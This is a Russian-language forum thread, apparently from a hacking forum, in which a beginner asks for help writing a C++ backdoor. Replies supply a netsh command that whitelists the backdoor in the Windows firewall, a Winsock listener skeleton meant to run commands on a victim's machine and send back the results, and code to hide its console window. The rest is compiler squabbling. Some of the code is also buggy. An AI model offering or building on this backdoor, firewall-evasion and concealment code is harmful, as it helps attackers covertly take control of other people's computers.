Сразу прошу прощения за содания новой темы, так как в гугле ничего не нашол. В общем, хочу попробывать написать свой backdoor. Хотелось бы примеров самых елементарных Клиент-сервер приложений. Если есть исходники бэкдуров на C++ то тоже выложите. Буду благодарен за любую помощь
Написание клиент-сервер самое легкое. Если хочешь написать хороший backdoor тебе придеться обойти firewall это уже довольно трудно,конечно если речь не идет о виндовс firewall-е =) Его можна обойти вот таким вот способом : Code: netsh firewall add allowedprogram program="C:\PUT_BACKDOORU.EXE" scope=ALL name=Name_of_Backdoor_in_firewall_allowedprogram_list Если пишеш на C или C++ то передай примерно такую строку функции system() и считай что ты общел виндовс firewall =)
Вот ещё нашол мануал по Клиент-Сервер (для C++ Builder) http://www.cyberguru.ru/cbuilder-sources/network/rabota-s-soketami-na-vcl.html но при запуске клиента она выдаёт ошибку "Asyncchronous socket error 10061" извинте в си++ я новичок, может я что не так сделал?
https://forum.antichat.ru/thread55225.html http://forum.antichat.ru/thread19146.html ----------------- имхо, крайне тупая и бесполезная тема
Привет. Я вот никак не понимаю почему ты пишеш троянь с GUI ??? Скачай себе компилятор LCC-WIN32 - самый лучший вариант для написание бекдора,т.к. программы получаються довольно маленькими + не приходиться добавлять разные библиотеки как это делаеться в VC++. Создай консольную программу,закинь туда такой код : Code: #include <winsock2.h> #include <windows.h> #include <stdio.h> #define PORT 22222 int main(void) { struct sockaddr_in addr; // структуа где будет храниться наш локальный адрес WSADATA wsd; // тут будет храниться информации о загруженном сокете SOCKET ls,rs; // два сокет,один для принятии подключении другой для коммуникации с клиентом char r_buf[1024],s_buf[1024]; // заниаем в памяти место с размером два килобайта. int r_buflen; if(WSAStartup(MAKEWORD(2,2),&wsd) == 0) // Загружаем виндовс сокет { // заполняем структуру для локального адреса addr.sin_addr.s_addr = htonl(INADDR_ANY); // addr.sin_port = htons(PORT); // Переводим константу INADDR_ANY и PORT внутренний формат addr.sin_family = AF_INET; ls = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); // создаем сокет,протокол TCP if(bind(ls,(SOCKADDR*)&addr,sizeof(addr)) == -1) // соединяем локальный адрес с сокет { puts("Error : bind()"); } if(listen(ls,3) != -1) // посылаем сигнал kernel-у, что мы готовы принимать соединения { rs = accept(ls,NULL,NULL); // а тут принимаем соединение if(rs != -1) { r_buflen = recv(rs,r_buf,strlen(r_buf),0); // после принимаем данный от удаленного хоста if(r_buflen != -1 && r_buflen != 0) { /* ТУТ ПРОВОДИМ СВОИ УЖАСНЫЕ ОПЕРАЦИИ НА УДАЛЛЕНОМ КОМПЕ =D */ /* И ПОСЫЛАЕМ РЕЗУЛЬТАТ КЛИЕНТУ,Т.Е. НА ТВОИ КОМП */ send(rs,s_buf,strlen(s_buf),0); } } } else { puts("Error : listen()"); } } else { puts("Error : WSAStartup()"); } return 0; } После этого тебе наверника придеться скрыт консольное окно своей программы,делаем это так : Code: char h_name[128]; HWND h; GetModuleFileNameA(NULL,h_name,strlen(h_name)); h = FindWindowA(NULL,h_name); Только если эту прогу запустишь с помощью компилятора то окно не исчезнет,зайди в папку где ты сохранил прогу и запусти ее нормальнын способом.
xismyname спасибо, правда гуглил, все ссылки битые. На офф сайте тоже нету http://www.cs.virginia.edu/~lcc-win32/lccwin32.exe .Можеш выложит пожайлусто?
>> + не приходиться добавлять разные библиотеки как это делаеться в VC++. хм почему-то я компилю как раз-таки в Visual Studio, там элементарно параметры проекта поменять и либ не будет лишних прилинковываться. конечно, если по дефолту все оставлять, то будете тащить либы с собой. и вообще там можно очень маленькие приложения создавать, если уметь настраивать. а так, конечно, просто сказать, что студия гавно >> После этого тебе наверника придеться скрыт консольное окно своей программы,делаем это так а я просто в настройках проекта подсистему меняла с CONSOLE на GUI (в студии, которыю вы неуместно пинаете). все лишний гимор себе создаете
Давайте сделаем так,вы буду возиться со своими настроиками а мы вызовим две WinAPI функции и проблема решена.Если вы не заметили он начинающий - ему это только на пользу. GUI программа всегда получаеться с большим размером чем CONSOLE,даже если там невидны окна. Насчет студии от мелкософта то я буду пинать и вы меня никак не остановите Если вам нечего сказать по теме то не оффтопьте.
>> GUI программа всегда получаеться с большим размером чем CONSOLE,даже если там невидны окна. Есть такое поле в опциональном заголовке PE-файла Subsystem (2 байта). Так вот. если оно имеет значение 2, то это GUI, если 3 - console (1 - Native и еtс). Встречный вопрос. Если я 3 заменю на 2 (изменив таким образом подсистему) размер файла измениться? Модеры можете удалить, но это дельный оффтоп. сори